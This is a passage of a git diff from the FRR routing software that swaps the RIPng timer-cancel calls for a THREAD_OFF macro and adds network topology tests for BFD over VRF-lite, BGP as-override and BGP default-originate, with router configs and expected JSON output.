+ THREAD_OFF(tmp_rinfo->t_garbage_collect);
list_delete_node(list, node);
ripng_info_free(tmp_rinfo);
}
- RIPNG_TIMER_OFF(rinfo->t_timeout);
- RIPNG_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_garbage_collect);
memcpy(rinfo, rinfo_new, sizeof(struct ripng_info));
if (ripng_route_rte(rinfo)) {
@@ -557,7 +557,7 @@ struct ripng_info *ripng_ecmp_delete(struct ripng *ripng,
struct agg_node *rp = rinfo->rp;
struct list *list = (struct list *)rp->info;
- RIPNG_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
if (rinfo->metric != RIPNG_METRIC_INFINITY)
ripng_aggregate_decrement(rp, rinfo);
@@ -565,7 +565,7 @@ struct ripng_info *ripng_ecmp_delete(struct ripng *ripng,
if (listcount(list) > 1) {
/* Some other ECMP entries still exist. Just delete this entry.
*/
- RIPNG_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_garbage_collect);
listnode_delete(list, rinfo);
if (ripng_route_rte(rinfo)
&& CHECK_FLAG(rinfo->flags, RIPNG_RTF_FIB))
@@ -611,7 +611,7 @@ static void ripng_timeout(struct thread *t)
static void ripng_timeout_update(struct ripng *ripng, struct ripng_info *rinfo)
{
if (rinfo->metric != RIPNG_METRIC_INFINITY) {
- RIPNG_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
thread_add_timer(master, ripng_timeout, rinfo,
ripng->timeout_time, &rinfo->t_timeout);
}
@@ -1022,7 +1022,7 @@ void ripng_redistribute_delete(struct ripng *ripng, int type, int sub_type,
RIPNG_TIMER_ON(rinfo->t_garbage_collect,
ripng_garbage_collect,
ripng->garbage_time);
- RIPNG_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
/* Aggregate count decrement. */
ripng_aggregate_decrement(rp, rinfo);
@@ -1061,7 +1061,7 @@ void ripng_redistribute_withdraw(struct ripng *ripng, int type)
RIPNG_TIMER_ON(rinfo->t_garbage_collect,
ripng_garbage_collect,
ripng->garbage_time);
- RIPNG_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
/* Aggregate count decrement. */
ripng_aggregate_decrement(rp, rinfo);
@@ -1445,7 +1445,7 @@ static void ripng_update(struct thread *t)
/* Triggered updates may be suppressed if a regular update is due by
the time the triggered update would be sent. */
- thread_cancel(&ripng->t_triggered_interval);
+ THREAD_OFF(ripng->t_triggered_interval);
ripng->trigger = 0;
/* Reset flush event. */
@@ -1472,7 +1472,7 @@ void ripng_triggered_update(struct thread *t)
int interval;
/* Cancel interval timer. */
- thread_cancel(&ripng->t_triggered_interval);
+ THREAD_OFF(ripng->t_triggered_interval);
ripng->trigger = 0;
/* Logging triggered update. */
@@ -1917,7 +1917,7 @@ void ripng_event(struct ripng *ripng, enum ripng_event event, int sock)
&ripng->t_read);
break;
case RIPNG_UPDATE_EVENT:
- thread_cancel(&ripng->t_update);
+ THREAD_OFF(ripng->t_update);
/* Update timer jitter. */
jitter = ripng_update_jitter(ripng->update_time);
@@ -2209,8 +2209,8 @@ void ripng_ecmp_disable(struct ripng *ripng)
/* Drop all other entries, except the first one. */
for (ALL_LIST_ELEMENTS(list, node, nextnode, tmp_rinfo))
if (tmp_rinfo != rinfo) {
- RIPNG_TIMER_OFF(tmp_rinfo->t_timeout);
- RIPNG_TIMER_OFF(
+ THREAD_OFF(tmp_rinfo->t_timeout);
+ THREAD_OFF(
tmp_rinfo->t_garbage_collect);
list_delete_node(list, node);
ripng_info_free(tmp_rinfo);
@@ -2528,8 +2528,8 @@ static void ripng_instance_disable(struct ripng *ripng)
ripng_zebra_ipv6_delete(ripng, rp);
for (ALL_LIST_ELEMENTS_RO(list, listnode, rinfo)) {
- RIPNG_TIMER_OFF(rinfo->t_timeout);
- RIPNG_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_garbage_collect);
ripng_info_free(rinfo);
}
list_delete(&list);
@@ -2548,12 +2548,12 @@ static void ripng_instance_disable(struct ripng *ripng)
ripng_redistribute_disable(ripng);
/* Cancel the RIPng timers */
- RIPNG_TIMER_OFF(ripng->t_update);
- RIPNG_TIMER_OFF(ripng->t_triggered_update);
- RIPNG_TIMER_OFF(ripng->t_triggered_interval);
+ THREAD_OFF(ripng->t_update);
+ THREAD_OFF(ripng->t_triggered_update);
+ THREAD_OFF(ripng->t_triggered_interval);
/* Cancel the read thread */
- thread_cancel(&ripng->t_read);
+ THREAD_OFF(ripng->t_read);
/* Close the RIPng socket */
if (ripng->sock >= 0) {
diff --git a/ripngd/ripngd.h b/ripngd/ripngd.h
index 6bf687b02a..ac2edc5b2c 100644
--- a/ripngd/ripngd.h
+++ b/ripngd/ripngd.h
@@ -312,8 +312,6 @@ enum ripng_event {
/* RIPng timer on/off macro. */
#define RIPNG_TIMER_ON(T,F,V) thread_add_timer (master, (F), rinfo, (V), &(T))
-#define RIPNG_TIMER_OFF(T) thread_cancel(&(T))
-
#define RIPNG_OFFSET_LIST_IN 0
#define RIPNG_OFFSET_LIST_OUT 1
#define RIPNG_OFFSET_LIST_MAX 2
diff --git a/tests/topotests/bfd_vrflite_topo1/__init__.py b/tests/topotests/bfd_vrflite_topo1/__init__.py
new file mode 100644
index 0000000000..e69de29bb2
--- /dev/null
+++ b/tests/topotests/bfd_vrflite_topo1/__init__.py
diff --git a/tests/topotests/bfd_vrflite_topo1/r1/bfd_peers_status.json b/tests/topotests/bfd_vrflite_topo1/r1/bfd_peers_status.json
new file mode 100644
index 0000000000..07e96d74bd
--- /dev/null
+++ b/tests/topotests/bfd_vrflite_topo1/r1/bfd_peers_status.json
@@ -0,0 +1,96 @@
+[
+ {
+ "multihop":false,
+ "peer":"192.168.0.2",
+ "vrf":"vrf1",
+ "passive-mode":false,
+ "status":"up",
+ "diagnostic":"ok",
+ "remote-diagnostic":"ok",
+ "receive-interval":1000,
+ "transmit-interval":1000,
+ "echo-receive-interval":50,
+ "echo-transmit-interval":0,
+ "detect-multiplier":3,
+ "remote-receive-interval":1000,
+ "remote-transmit-interval":1000,
+ "remote-echo-receive-interval":50,
+ "remote-detect-multiplier":3
+ },
+ {
+ "multihop":true,
+ "peer":"192.0.2.2",
+ "local":"192.0.2.1",
+ "vrf":"vrf2",
+ "passive-mode":false,
+ "minimum-ttl":254,
+ "status":"up",
+ "diagnostic":"ok",
+ "remote-diagnostic":"ok",
+ "receive-interval":1000,
+ "transmit-interval":1000,
+ "echo-receive-interval":50,
+ "echo-transmit-interval":0,
+ "detect-multiplier":3,
+ "remote-receive-interval":1000,
+ "remote-transmit-interval":1000,
+ "remote-echo-receive-interval":50,
+ "remote-detect-multiplier":3
+ },
+ {
+ "multihop":false,
+ "peer":"192.168.0.2",
+ "vrf":"vrf2",
+ "passive-mode":false,
+ "status":"up",
+ "diagnostic":"ok",
+ "remote-diagnostic":"ok",
+ "receive-interval":1000,
+ "transmit-interval":1000,
+ "echo-receive-interval":50,
+ "echo-transmit-interval":0,
+ "detect-multiplier":3,
+ "remote-receive-interval":1000,
+ "remote-transmit-interval":1000,
+ "remote-echo-receive-interval":50,
+ "remote-detect-multiplier":3
+ },
+ {
+ "multihop":false,
+ "peer":"192.168.0.2",
+ "vrf":"default",
+ "passive-mode":false,
+ "status":"up",
+ "diagnostic":"ok",
+ "remote-diagnostic":"ok",
+ "receive-interval":1000,
+ "transmit-interval":1000,
+ "echo-receive-interval":50,
+ "echo-transmit-interval":0,
+ "detect-multiplier":3,
+ "remote-receive-interval":1000,
+ "remote-transmit-interval":1000,
+ "remote-echo-receive-interval":50,
+ "remote-detect-multiplier":3
+ },
+ {
+ "multihop":true,
+ "peer":"192.0.2.2",
+ "local":"192.0.2.1",
+ "vrf":"vrf1",
+ "passive-mode":false,
+ "minimum-ttl":254,
+ "status":"up",
+ "diagnostic":"ok",
+ "remote-diagnostic":"ok",
+ "receive-interval":1000,
+ "transmit-interval":1000,
+ "echo-receive-interval":50,
+ "echo-transmit-interval":0,
+ "detect-multiplier":3,
+ "remote-receive-interval":1000,
+ "remote-transmit-interval":1000,
+ "remote-echo-receive-interval":50,
+ "remote-detect-multiplier":3
+ }
+]
diff --git a/tests/topotests/bfd_vrflite_topo1/r1/bfdd.conf b/tests/topotests/bfd_vrflite_topo1/r1/bfdd.conf
new file mode 100644
index 0000000000..96e8ff4b12
--- /dev/null
+++ b/tests/topotests/bfd_vrflite_topo1/r1/bfdd.conf
@@ -0,0 +1,26 @@
+!
+! debug bfd network
+! debug bfd peer
+! debug bfd zebra
+!
+bfd
+ peer 192.168.0.2 vrf vrf1
+ transmit-interval 1000
+ receive-interval 1000
+ !
+ peer 192.168.0.2 vrf vrf2
+ transmit-interval 1000
+ receive-interval 1000
+ !
+ peer 192.168.0.2
+ transmit-interval 1000
+ receive-interval 1000
+ !
+ peer 192.0.2.2 multihop local-address 192.0.2.1 vrf vrf1
+ transmit-interval 1000
+ receive-interval 1000
+ !
+ peer 192.0.2.2 multihop local-address 192.0.2.1 vrf vrf2
+ transmit-interval 1000
+ receive-interval 1000
+ ! \ No newline at end of file
diff --git a/tests/topotests/bfd_vrflite_topo1/r1/zebra.conf b/tests/topotests/bfd_vrflite_topo1/r1/zebra.conf
new file mode 100644
index 0000000000..ebb4e63be7
--- /dev/null
+++ b/tests/topotests/bfd_vrflite_topo1/r1/zebra.conf
@@ -0,0 +1,24 @@
+vrf vrf1
+ ip route 192.0.2.2/32 192.168.0.2
+!
+vrf vrf2
+ ip route 192.0.2.2/32 192.168.0.2
+!
+interface r1-eth0 vrf vrf3
+ ip address 192.168.0.1/24
+!
+interface r1-eth0.100 vrf vrf1
+ ip address 192.168.0.1/24
+!
+interface r1-eth0.200 vrf vrf2
+ ip address 192.168.0.1/24
+!
+interface r1-eth0.300
+ ip address 192.168.0.1/24
+!
+interface r1-loop1 vrf vrf1
+ ip address 192.0.2.1/32
+!
+interface r1-loop2 vrf vrf2
+ ip address 192.0.2.1/32
+! \ No newline at end of file
diff --git a/tests/topotests/bfd_vrflite_topo1/r2/bfdd.conf b/tests/topotests/bfd_vrflite_topo1/r2/bfdd.conf
new file mode 100644
index 0000000000..7b11a4785a
--- /dev/null
+++ b/tests/topotests/bfd_vrflite_topo1/r2/bfdd.conf
@@ -0,0 +1,26 @@
+!
+! debug bfd network
+! debug bfd peer
+! debug bfd zebra
+!
+bfd
+ peer 192.168.0.1 vrf vrf1
+ transmit-interval 1000
+ receive-interval 1000
+ !
+ peer 192.168.0.1 vrf vrf2
+ transmit-interval 1000
+ receive-interval 1000
+ !
+ peer 192.168.0.1
+ transmit-interval 1000
+ receive-interval 1000
+ !
+ peer 192.0.2.1 multihop local-address 192.0.2.2 vrf vrf1
+ transmit-interval 1000
+ receive-interval 1000
+ !
+ peer 192.0.2.1 multihop local-address 192.0.2.2 vrf vrf2
+ transmit-interval 1000
+ receive-interval 1000
+ ! \ No newline at end of file
diff --git a/tests/topotests/bfd_vrflite_topo1/r2/zebra.conf b/tests/topotests/bfd_vrflite_topo1/r2/zebra.conf
new file mode 100644
index 0000000000..d8b996e9ed
--- /dev/null
+++ b/tests/topotests/bfd_vrflite_topo1/r2/zebra.conf
@@ -0,0 +1,24 @@
+vrf vrf1
+ ip route 192.0.2.1/32 192.168.0.1
+!
+vrf vrf2
+ ip route 192.0.2.1/32 192.168.0.1
+!
+interface r2-eth0 vrf vrf3
+ ip address 192.168.0.2/24
+!
+interface r2-eth0.100 vrf vrf1
+ ip address 192.168.0.2/24
+!
+interface r2-eth0.200 vrf vrf2
+ ip address 192.168.0.2/24
+!
+interface r2-eth0.300
+ ip address 192.168.0.2/24
+!
+interface r2-loop1 vrf vrf1
+ ip address 192.0.2.2/32
+!
+interface r2-loop2 vrf vrf2
+ ip address 192.0.2.2/32
+! \ No newline at end of file
diff --git a/tests/topotests/bfd_vrflite_topo1/test_bfd_vrflite_topo1.py b/tests/topotests/bfd_vrflite_topo1/test_bfd_vrflite_topo1.py
new file mode 100644
index 0000000000..b7afb8e3b9
--- /dev/null
+++ b/tests/topotests/bfd_vrflite_topo1/test_bfd_vrflite_topo1.py
@@ -0,0 +1,153 @@
+#!/usr/bin/env python
+
+#
+# test_bfd_vrflite_topo1.py
+# Part of NetDEF Topology Tests
+#
+# Copyright (c) 2018 by
+# Network Device Education Foundation, Inc. ("NetDEF")
+# Copyright (c) 2022 by 6WIND
+#
+# Permission to use, copy, modify, and/or distribute this software
+# for any purpose with or without fee is hereby granted, provided
+# that the above copyright notice and this permission notice appear
+# in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND NETDEF DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NETDEF BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
+# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
+# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
+# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
+# OF THIS SOFTWARE.
+#
+
+"""
+test_bfd_vrflite_topo1.py: Test the FRR BFD daemon.
+"""
+
+import os
+import sys
+import json
+from functools import partial
+import pytest
+
+# Save the Current Working Directory to find configuration files.
+CWD = os.path.dirname(os.path.realpath(__file__))
+sys.path.append(os.path.join(CWD, "../"))
+
+# pylint: disable=C0413
+# Import topogen and topotest helpers
+from lib import topotest
+from lib.topogen import Topogen, TopoRouter, get_topogen
+from lib.topolog import logger
+
+# Required to instantiate the topology builder class.
+
+pytestmark = [pytest.mark.bfdd, pytest.mark.bgpd]
+
+
+def build_topo(tgen):
+ # Create 2 routers
+ for routern in range(1, 3):
+ tgen.add_router("r{}".format(routern))
+
+ switch = tgen.add_switch("s1")
+ switch.add_link(tgen.gears["r1"])
+ switch.add_link(tgen.gears["r2"])
+
+ switch = tgen.add_switch("s2")
+ switch.add_link(tgen.gears["r2"])
+
+ switch = tgen.add_switch("s3")
+ switch.add_link(tgen.gears["r1"])
+
+
+def setup_module(mod):
+ "Sets up the pytest environment"
+ tgen = Topogen(build_topo, mod.__name__)
+ tgen.start_topology()
+
+ router_list = tgen.routers()
+
+ logger.info("Testing with Linux VRF support and udp_l3mdev=0")
+ if os.system("echo 0 > /proc/sys/net/ipv4/udp_l3mdev_accept") != 0:
+ return pytest.skip(
+ "Skipping BFD vrflite Topo1 Test. Linux VRF not available on System"
+ )
+
+ for rname, router in router_list.items():
+ router.net.add_l3vrf("vrf1", 10)
+ router.net.add_l3vrf("vrf2", 20)
+ router.net.add_l3vrf("vrf3", 30)
+ router.net.add_vlan(rname + "-eth0.100", rname + "-eth0", 100)
+ router.net.add_vlan(rname + "-eth0.200", rname + "-eth0", 200)
+ router.net.add_vlan(rname + "-eth0.300", rname + "-eth0", 300)
+ router.net.attach_iface_to_l3vrf(rname + "-eth0.100", "vrf1")
+ router.net.attach_iface_to_l3vrf(rname + "-eth0.200", "vrf2")
+ router.net.add_loop(rname + "-loop1")
+ router.net.add_loop(rname + "-loop2")
+ router.net.attach_iface_to_l3vrf(rname + "-loop1", "vrf1")
+ router.net.attach_iface_to_l3vrf(rname + "-loop2", "vrf2")
+ router.net.attach_iface_to_l3vrf(rname + "-eth0", "vrf3")
+
+ for rname, router in router_list.items():
+ router.load_config(
+ TopoRouter.RD_ZEBRA,
+ os.path.join(CWD, "{}/zebra.conf".format(rname))
+ )
+ router.load_config(
+ TopoRouter.RD_BFD, os.path.join(CWD, "{}/bfdd.conf".format(rname))
+ )
+
+ # Initialize all routers.
+ tgen.start_router()
+
+
+def teardown_module(_mod):
+ "Teardown the pytest environment"
+ tgen = get_topogen()
+
+ # Move interfaces out of vrf namespace and delete the namespace
+ router_list = tgen.routers()
+ for rname, router in router_list.items():
+ router.net.del_iface(rname + "-eth0.100")
+ router.net.del_iface(rname + "-eth0.200")
+ router.net.del_iface(rname + "-eth0.300")
+ router.net.del_iface(rname + "-loop1")
+ router.net.del_iface(rname + "-loop2")
+
+ tgen.stop_topology()
+
+
+def test_bfd_connection():
+ "Assert that the BFD peers can find themselves."
+ tgen = get_topogen()
+ if tgen.routers_have_failure():
+ pytest.skip(tgen.errors)
+ logger.info("waiting for bfd peers to go up")
+ router = tgen.gears['r1']
+ json_file = "{}/{}/bfd_peers_status.json".format(CWD, 'r1')
+ expected = json.loads(open(json_file).read())
+
+ test_func = partial(
+ topotest.router_json_cmp, router, "show bfd peers json", expected
+ )
+ _, result = topotest.run_and_expect(test_func, None, count=16, wait=1)
+ assertmsg = '"{}" JSON output mismatches'.format(router.name)
+ assert result is None, assertmsg
+
+
+def test_memory_leak():
+ "Run the memory leak test and report results."
+ tgen = get_topogen()
+ if not tgen.is_memleak_enabled():
+ pytest.skip("Memory leak test/report is disabled")
+
+ tgen.report_memory_leaks()
+
+
+if __name__ == "__main__":
+ args = ["-s"] + sys.argv[1:]
+ sys.exit(pytest.main(args))
diff --git a/tests/topotests/bgp_as_override/__init__.py b/tests/topotests/bgp_as_override/__init__.py
new file mode 100644
index 0000000000..e69de29bb2
--- /dev/null
+++ b/tests/topotests/bgp_as_override/__init__.py
diff --git a/tests/topotests/bgp_as_override/r1/bgpd.conf b/tests/topotests/bgp_as_override/r1/bgpd.conf
new file mode 100644
index 0000000000..3cfb7a2c90
--- /dev/null
+++ b/tests/topotests/bgp_as_override/r1/bgpd.conf
@@ -0,0 +1,10 @@
+!
+router bgp 65001
+ no bgp ebgp-requires-policy
+ neighbor 192.168.1.1 remote-as external
+ neighbor 192.168.1.1 timers 1 3
+ neighbor 192.168.1.1 timers connect 1
+ address-family ipv4
+ redistribute connected
+ exit-address-family
+!
diff --git a/tests/topotests/bgp_as_override/r1/zebra.conf b/tests/topotests/bgp_as_override/r1/zebra.conf
new file mode 100644
index 0000000000..63728eb5d5
--- /dev/null
+++ b/tests/topotests/bgp_as_override/r1/zebra.conf
@@ -0,0 +1,9 @@
+!
+interface lo
+ ip address 172.16.255.1/32
+!
+interface r1-eth0
+ ip address 192.168.1.2/30
+!
+ip forwarding
+!
diff --git a/tests/topotests/bgp_as_override/r2/bgpd.conf b/tests/topotests/bgp_as_override/r2/bgpd.conf
new file mode 100644
index 0000000000..5e3b0c7f87
--- /dev/null
+++ b/tests/topotests/bgp_as_override/r2/bgpd.conf
@@ -0,0 +1,10 @@
+!
+router bgp 65002
+ no bgp ebgp-requires-policy
+ neighbor 192.168.1.2 remote-as external
+ neighbor 192.168.1.2 timers 1 3
+ neighbor 192.168.1.2 timers connect 1
+ neighbor 192.168.2.2 remote-as external
+ neighbor 192.168.2.2 timers 1 3
+ neighbor 192.168.2.2 timers connect 1
+!
diff --git a/tests/topotests/bgp_as_override/r2/zebra.conf b/tests/topotests/bgp_as_override/r2/zebra.conf
new file mode 100644
index 0000000000..5bdfd02224
--- /dev/null
+++ b/tests/topotests/bgp_as_override/r2/zebra.conf
@@ -0,0 +1,9 @@
+!
+interface r2-eth0
+ ip address 192.168.1.1/30
+!
+interface r2-eth1
+ ip address 192.168.2.1/30
+!
+ip forwarding
+!
diff --git a/tests/topotests/bgp_as_override/r3/bgpd.conf b/tests/topotests/bgp_as_override/r3/bgpd.conf
new file mode 100644
index 0000000000..6bbe56b678
--- /dev/null
+++ b/tests/topotests/bgp_as_override/r3/bgpd.conf
@@ -0,0 +1,13 @@
+!
+router bgp 65003
+ no bgp ebgp-requires-policy
+ neighbor 192.168.2.1 remote-as external
+ neighbor 192.168.2.1 timers 1 3
+ neighbor 192.168.2.1 timers connect 1
+ neighbor 192.168.3.1 remote-as external
+ neighbor 192.168.3.1 timers 1 3
+ neighbor 192.168.3.1 timers connect 1
+ address-family ipv4 unicast
+ neighbor 192.168.3.1 as-override
+ exit-address-family
+!
diff --git a/tests/topotests/bgp_as_override/r3/zebra.conf b/tests/topotests/bgp_as_override/r3/zebra.conf
new file mode 100644
index 0000000000..77782be3a8
--- /dev/null
+++ b/tests/topotests/bgp_as_override/r3/zebra.conf
@@ -0,0 +1,9 @@
+!
+interface r3-eth0
+ ip address 192.168.2.2/30
+!
+interface r3-eth1
+ ip address 192.168.3.2/30
+!
+ip forwarding
+!
diff --git a/tests/topotests/bgp_as_override/r4/bgpd.conf b/tests/topotests/bgp_as_override/r4/bgpd.conf
new file mode 100644
index 0000000000..1bdee0800a
--- /dev/null
+++ b/tests/topotests/bgp_as_override/r4/bgpd.conf
@@ -0,0 +1,7 @@
+!
+router bgp 65001
+ no bgp ebgp-requires-policy
+ neighbor 192.168.3.2 remote-as external
+ neighbor 192.168.3.2 timers 1 3
+ neighbor 192.168.3.2 timers connect 1
+!
diff --git a/tests/topotests/bgp_as_override/r4/zebra.conf b/tests/topotests/bgp_as_override/r4/zebra.conf
new file mode 100644
index 0000000000..71dc595558
--- /dev/null
+++ b/tests/topotests/bgp_as_override/r4/zebra.conf
@@ -0,0 +1,6 @@
+!
+interface r4-eth0
+ ip address 192.168.3.1/30
+!
+ip forwarding
+!
diff --git a/tests/topotests/bgp_as_override/test_bgp_as_override.py b/tests/topotests/bgp_as_override/test_bgp_as_override.py
new file mode 100644
index 0000000000..40085cd7ec
--- /dev/null
+++ b/tests/topotests/bgp_as_override/test_bgp_as_override.py
@@ -0,0 +1,122 @@
+#!/usr/bin/env python
+
+#
+# Copyright (c) 2022 by
+# Donatas Abraitis <donatas@opensourcerouting.org>
+#
+# Permission to use, copy, modify, and/or distribute this software
+# for any purpose with or without fee is hereby granted, provided
+# that the above copyright notice and this permission notice appear
+# in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND NETDEF DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NETDEF BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
+# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
+# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
+# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
+# OF THIS SOFTWARE.
+#
+
+"""
+"""
+
+import os
+import sys
+import json
+import pytest
+import functools
+
+CWD = os.path.dirname(os.path.realpath(__file__))
+sys.path.append(os.path.join(CWD, "../"))
+
+# pylint: disable=C0413
+from lib import topotest
+from lib.topogen import Topogen, TopoRouter, get_topogen
+from lib.common_config import step
+
+pytestmark = [pytest.mark.bgpd]
+
+
+def build_topo(tgen):
+ for routern in range(1, 7):
+ tgen.add_router("r{}".format(routern))
+
+ switch = tgen.add_switch("s1")
+ switch.add_link(tgen.gears["r1"])
+ switch.add_link(tgen.gears["r2"])
+
+ switch = tgen.add_switch("s2")
+ switch.add_link(tgen.gears["r2"])
+ switch.add_link(tgen.gears["r3"])
+
+ switch = tgen.add_switch("s3")
+ switch.add_link(tgen.gears["r3"])
+ switch.add_link(tgen.gears["r4"])
+
+
+def setup_module(mod):
+ tgen = Topogen(build_topo, mod.__name__)
+ tgen.start_topology()
+
+ router_list = tgen.routers()
+
+ for i, (rname, router) in enumerate(router_list.items(), 1):
+ router.load_config(
+ TopoRouter.RD_ZEBRA, os.path.join(CWD, "{}/zebra.conf".format(rname))
+ )
+ router.load_config(
+ TopoRouter.RD_BGP, os.path.join(CWD, "{}/bgpd.conf".format(rname))
+ )
+
+ tgen.start_router()
+
+
+def teardown_module(mod):
+ tgen = get_topogen()
+ tgen.stop_topology()
+
+
+def test_bgp_as_override():
+ tgen = get_topogen()
+
+ if tgen.routers_have_failure():
+ pytest.skip(tgen.errors)
+
+ r3 = tgen.gears["r3"]
+ r4 = tgen.gears["r4"]
+
+ def _bgp_converge():
+ output = json.loads(r3.vtysh_cmd("show ip bgp neighbor 192.168.2.1 json"))
+ expected = {
+ "192.168.2.1": {
+ "bgpState": "Established",
+ "addressFamilyInfo": {"ipv4Unicast": {"acceptedPrefixCounter": 2}},
+ }
+ }
+ return topotest.json_cmp(output, expected)
+
+ def _bgp_as_override():
+ output = json.loads(r4.vtysh_cmd("show bgp ipv4 unicast json"))
+ expected = {
+ "routes": {
+ "172.16.255.1/32": [{"valid": True, "path": "65003 65002 65003"}]
+ }
+ }
+ return topotest.json_cmp(output, expected)
+
+ step("Initial BGP converge")
+ test_func = functools.partial(_bgp_converge)
+ _, result = topotest.run_and_expect(test_func, None, count=60, wait=0.5)
+ assert result is None, "Failed to see BGP convergence on R4"
+
+ step("Check if BGP as-override from R3 works")
+ test_func = functools.partial(_bgp_as_override)
+ _, result = topotest.run_and_expect(test_func, None, count=60, wait=0.5)
+ assert result is None, "Failed to see overriden ASN (65001) from R3"
+
+
+if __name__ == "__main__":
+ args = ["-s"] + sys.argv[1:]
+ sys.exit(pytest.main(args))
diff --git a/tests/topotests/bgp_default_originate/bgp_default_originate_2links.json b/tests/topotests/bgp_default_originate/bgp_default_originate_2links.json
new file mode 100644
index 0000000000..9e98235a2e
--- /dev/null
+++ b/tests/topotests/bgp_default_originate/bgp_default_originate_2links.json
@@ -0,0 +1,136 @@
+{
+ "address_types": ["ipv4", "ipv6"],
+ "ipv4base": "192.168.0.0",
+ "ipv4mask": 3024,
+ "ipv6base": "fd00::",
+ "ipv6mask": 64,
+ "link_ip_start": {
+ "ipv4": "192.168.0.0",
+ "v4mask": 24,
+ "ipv6": "fd00::",
+ "v6mask": 64
+ },
+ "lo_prefix": {"ipv4": "1.0.", "v4mask": 32, "ipv6": "2001:db8:f::", "v6mask": 128},
+ "routers": {
+ "r0": {
+ "links": {
+ "lo": {"ipv4": "auto", "ipv6": "auto", "type": "loopback"},
+ "r1": {"ipv4": "auto", "ipv6": "auto"}
+ },
+ "bgp": {
+ "local_as": "100",
+ "address_family": {
+ "ipv4": {
+ "unicast": {"neighbor": {"r1": {"dest_link": {"r0": {}}}}}
+ },
+ "ipv6": {
+ "unicast": {"neighbor": {"r1": {"dest_link": {"r0": {}}}}}
+ }
+ }
+ }
+ },
+ "r1": {
+ "links": {
+ "lo": {"ipv4": "auto", "ipv6": "auto", "type": "loopback"},
+ "r0": {"ipv4": "auto", "ipv6": "auto"},
+ "r2-link1": {"ipv4": "auto", "ipv6": "auto"},
+ "r2-link2": {"ipv4": "auto", "ipv6": "auto"}
+ },
+ "bgp": {
+ "local_as": "200",
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "neighbor": {
+ "r0": {"dest_link": {"r1": {}}},
+ "r2": {"dest_link": {"r1-link1": {}, "r1-link2": {}}}
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "neighbor": {
+ "r0": {"dest_link": {"r1": {}}},
+ "r2": {"dest_link": {"r1-link1": {}, "r1-link2": {}}}
+ }
+ }
+ }
+ }
+ }
+ },
+ "r2": {
+ "links": {
+ "lo": {"ipv4": "auto", "ipv6": "auto", "type": "loopback"},
+ "r1-link1": {"ipv4": "auto", "ipv6": "auto"},
+ "r1-link2": {"ipv4": "auto", "ipv6": "auto"},
+ "r3": {"ipv4": "auto", "ipv6": "auto"}
+ },
+ "bgp": {
+ "local_as": "300",
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "neighbor": {
+ "r1": {"dest_link": {"r2-link1": {}, "r2-link2": {}}},
+ "r3": {"dest_link": {"r2": {}}}
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "neighbor": {
+ "r1": {"dest_link": {"r2-link1": {}, "r2-link2": {}}},
+ "r3": {"dest_link": {"r2": {}}}
+ }
+ }
+ }
+ }
+ }
+ },
+ "r3": {
+ "links": {
+ "lo": {"ipv4": "auto", "ipv6": "auto", "type": "loopback"},
+ "r2": {"ipv4": "auto", "ipv6": "auto"},
+ "r4": {"ipv4": "auto", "ipv6": "auto"}
+ },
+ "bgp": {
+ "local_as": "400",
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "neighbor": {
+ "r2": {"dest_link": {"r3": {}}},
+ "r4": {"dest_link": {"r3": {}}}
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "neighbor": {
+ "r2": {"dest_link": {"r3": {}}},
+ "r4": {"dest_link": {"r3": {}}}
+ }
+ }
+ }
+ }
+ }
+ },
+ "r4": {
+ "links": {
+ "lo": {"ipv4": "auto", "ipv6": "auto", "type": "loopback"},
+ "r3": {"ipv4": "auto", "ipv6": "auto"}
+ },
+ "bgp": {
+ "local_as": "500",
+ "address_family": {
+ "ipv4": {
+ "unicast": {"neighbor": {"r3": {"dest_link": {"r4": {}}}}}
+ },
+ "ipv6": {
+ "unicast": {"neighbor": {"r3": {"dest_link": {"r4": {}}}}}
+ }
+ }
+ }
+ }
+ }
+}
diff --git a/tests/topotests/bgp_default_originate/test_bgp_default_originate_2links.py b/tests/topotests/bgp_default_originate/test_bgp_default_originate_2links.py
new file mode 100644
index 0000000000..c8cdc7ec5c
--- /dev/null
+++ b/tests/topotests/bgp_default_originate/test_bgp_default_originate_2links.py
@@ -0,0 +1,1414 @@
+#!/usr/bin/env python
+#
+# Copyright (c) 2022 by VMware, Inc. ("VMware")
+# Used Copyright (c) 2018 by Network Device Education Foundation, Inc. ("NetDEF")
+# in this file.
+#
+# Permission to use, copy, modify, and/or distribute this software
+# for any purpose with or without fee is hereby granted, provided
+# that the above copyright notice and this permission notice appear
+# in all copies.
